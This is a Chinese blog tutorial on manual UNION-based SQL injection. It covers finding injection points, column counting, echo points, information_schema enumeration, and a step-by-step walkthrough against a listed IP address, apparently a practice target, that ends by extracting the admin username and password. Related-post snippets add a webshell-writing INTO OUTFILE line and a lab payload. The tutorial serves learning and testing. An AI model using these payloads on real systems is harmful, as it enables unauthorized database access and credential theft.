安科网

SQL注入(上)

廖金龙

廖金龙

2019-11-19

关注 关注

判断注入点

id=1',在1后面加',页面出错
id=1 and 1=1正常,id=1 and 1=2,页面出错
id=1 and 1='1'正常,id=1 and 1='1'页面出错
注:通过构造错误的语句,根据返回结果来判断是否存在注入点

手动注入

  • 判断字段数
    id =1 order by x,x=1,2,3,4,·······,按第1,2,3,4,······列进行排序
  • 判断回显点
    union select 1,2,3,4,5,6,7,8,9,10,11 from admin,1,2,3,4...,这里的几个数字纯粹是凑数的,凑够和union关键字前面的那个表的字段数一样,不然没法拼接成一个表。在sql注入的时候,在将相应位置替换成你想获得的数据,查询结果后面就会显示出来;效果是from当前字段对应的服务器端的一张表。权限肯定有限制,所以要看返回的数字才能确定哪一列可以回显到客户端,而不是随便哪一列都能利用的。比如服务器返回3,说明第3列可以回显

查询相关内容

  • 主机名
    @@hostname
  • OS
    @@version_compile_os
  • 查询数据库文件位置
    @@datadir
  • 查询当前数据库用户
    user()
  • 获取数据库名
    database()
  • 获取数据库版本
    version()或@@version

  • information_schema
    MySQL 5.0以上自带的数据库,记录当前MySQL下所有数据库名、表名、字段名

    • information_schema.tables 记录所有表名的表(.代表下一级的意思)
    • information_schema.columns 记录列名信息的表
    • table_name 表名
    • column_name 列名
    • table_schema 数据库名
  • 将ASC码转成对应字符
    char()
  • 字符串连接函数,可提高查询效率,char()中的字符起到分隔字符串的作用
    concat_ws(char(x,y,,z)@@version,@@datadir,``,@@version_compile_os,char(48))
  • 切分字符串
    substring_index(user(),''@'',1)
    将user()这个函数的返回值(字符串)以@为界限进行切分(好像用单引号'@'也行),显示第1段
  • 计算字符串x的md5值
    md5('x')

  • 减少视觉污染,在某个回显点不显示内容
    null

    注:查询列名时,回显点有可能会显示出其他数据库中的同表名的列名,是因为其他数据库中可能存在同名的表
  • 获得表内数据

    union select 1,2,3,4,5,6,7,8,9,10 from 表名
    在回显点选择想要获得的字段名,如:
    union select 1,2,3,4,password,6,7,8,9,10 from 表名

实战

目标链接:http://120.203.13.75:6815/index.php

  • 找注入点:

    http://120.203.13.75:6815/index.php?id=1 and 1=2

  • 判断字段数

    http://120.203.13.75:6815/index.php?id=1 order by 2

    1、2均正常显示,3的时候出现异常,则当前表的字段数为2

  • 判断回显点

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,2

    SQL注入(上)

  • 查相关内容(一定要在回显点处查看!)
    查数据库名

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()

    SQL注入(上)

    查数据库版本(mysql>5.0,5.0 以后的版本才有information_schema, information_schema存储着数据库名、表名、列的数据类型、访问权限等)

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()

    SQL注入(上)
    查表名

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

    SQL注入(上)

    查字段名

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

    SQL注入(上)

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

    SQL注入(上)

    http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

    SQL注入(上)
    查出 admin 表里 有 id username password 三个字段

    查询字段内容
    构造

    ?id=1 and 1=2 union select 1,username from admin  limit 0,1

    SQL注入(上)

    构造

    ?id=1 and 1=2 union select 1,password from admin  limit 1,1

    SQL注入(上)

    limit 1,1 没有回显,说明只有一个用户

    构造

    ?id=1 and 1=2 union select 1,password from admin  limit 0,1

    SQL注入(上)

    如此,得到了管理员账号和密码

sql注入

廖金龙

廖金龙

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

sql注入 --显错注入

jiong 2020-09-17

防止SQL注入的一些解决方法

-----解决方案--------------------------------------------------------过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement..------解决方案------------

ALiDan 2020-07-27

Dapper 封装02-组装SQL

在 SQLSERVER 里,我们在执行命令的时候我们是可以进行参数化传递的。这个好处主要可以防止注入。我们正常写一个 Where 语句,比如WHERE Age=23 and name like ‘%delaywu%‘。从这句话中我们知道一个where 表达

qshpeng 2020-07-26

SQL注入相关知识整理

哪里存在SQL注入?任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。文件名必须全路径,SELECT ‘<?php phpinfo(); ?>’ into outfile ‘c:\Windows\tmp\1.ph

世樹 2020-07-17

面试准备季——MyBatis 面试专题(含答案)

写在前面:2020年面试必备的Java后端进阶面试题总结了一份复习指南在Github上,内容详细,图文并茂,有需要学习的朋友可以Star一下!程序员直接编写原生态 sql,可以严格控制 sql 执行性能,灵活度高。MyBatis 可以使用 XML 或注解来

chenjiazhu 2020-07-08

web安全pikachu靶场之SQL注入

数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一

一对儿程序猿 2020-07-04

Django JSONField/HstoreField SQL注入(CVE-2019-14234)

在IDEA中创建个Django项目,打开已安装的包,发现Django版本已经是2.4,没有该漏洞了,于是修改一下,这里因为python2 是不支持Django,2.x版本的,所以这里用的python3,其实IDEA中venv很好配置。alter user

明月清风精进不止 2020-06-13

第三天--注入攻击:Web安全之SQL注入漏洞专题

第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP

godfather 2020-06-13

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringBuffer sql = new StringBuffer("select key_sn,remark,create_date from tb_selogon_key where 1=1 "); if(!

ItBJLan 2020-06-11

MyBatis中的$和#,用不好,准备走人!

2、${ }是字符串替换, MyBatis在处理${ }时,它会将sql中的${ }替换为变量的值,传入的数据不会加两边加上单引号。

tanrong 2020-06-11

dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法

漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。

ALiDan 2020-06-11

一个sql盲注小工具 (Golang版)

并发,二分法判断。源码写的有点垃圾,有点乱,结果也存在一些缺失。思路大概就是先判断长度,根据长度来开启多少个协程。对于循环导包的问题,直接copy了一份,重命名了一个包。数据存在丢失,而且有些会超时,主要为了练手。

码墨 2020-06-09

JavaWeb - JDBC、各个类详解、工具类、解决sql注入

各个数据库厂商去实现这套这套接口,提供数据库驱动jar包。     我们可以使用这套接口编程,真正执行的代码是驱动jar包中的实现类。    1.复制mysql-connector-java-5.1.37-bin.jar到项目的libs目录下。Strin

世樹 2020-06-05

一次sql server实战

单引号,很明显的错误,因为是时间格式:2020-6-2,所以这里肯定是字符型的。这里出现了关键性的第一个错误:‘CAST‘ 附近有语法错误,需要 ‘AS‘。但是ANDCAST( 这样,去掉中间的空格,语法都错误了。多熟悉几个sql模板语句,在注入的时候,猜

lt云飞扬gt 2020-06-03

CVE-2018-8045 Joomla内核SQL注入漏洞

Joomla是一套全球知名的内容管理系统,使用PHP语言、MySQL数据库所开发,适用于Linux、 Windows、MacOSX等各种平台。Joomla的运行环境是PHP+MYSQL+Apache,而phpStudy则集成了这三种程序,只要安装了phpS

godfather 2020-06-03

【复习】SQL注入和JS注入

测试过程中的输入框的测试涉及到的SQL注入和JS注入,这里简单记录一下。

xuanlvhaoshao 2020-05-14

企业检测SQL注入的一些方式探讨

在企业中有如下几种方式可以选择;最开始使用的是Seay源代码审计工具,后面使用的是Rips代码审计工具,发现都不能满足自己的需求,因为有个致命缺陷,就是会有遗漏的SQL注入找不全。Taint这种参数污染标记跟踪的工具又会比Rips的准确率高。Taint总会

qshpeng 2020-05-11

SQL注入漏洞测试(登录绕过)

SELECT * FROM accounts WHERE username=‘admin‘ and password = ‘password‘。  后端如果没做校验处理,username 和 password 值从前端传进来直接执行sql语句,就存在可以构

明月清风精进不止 2020-05-07

SQL注入bypass学习

练习sql注入过程中经常会遇到一些WAF的拦截,在网上找相关文章进行学习,并通过利用安全狗来练习Mysql环境下的bypass。在跟服务器交互的过程中,http允许 get 或者post多次传同一参数值,造成覆盖达到一些绕过waf的效果。在php/apac

gwn00 2020-05-07

sqli-labs-master 第二关+第三关+第四关

id=0") UNION SELECT 1,username, password from users limit 5,1 %23

sixyearsorless 2020-05-07
廖金龙

廖金龙

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号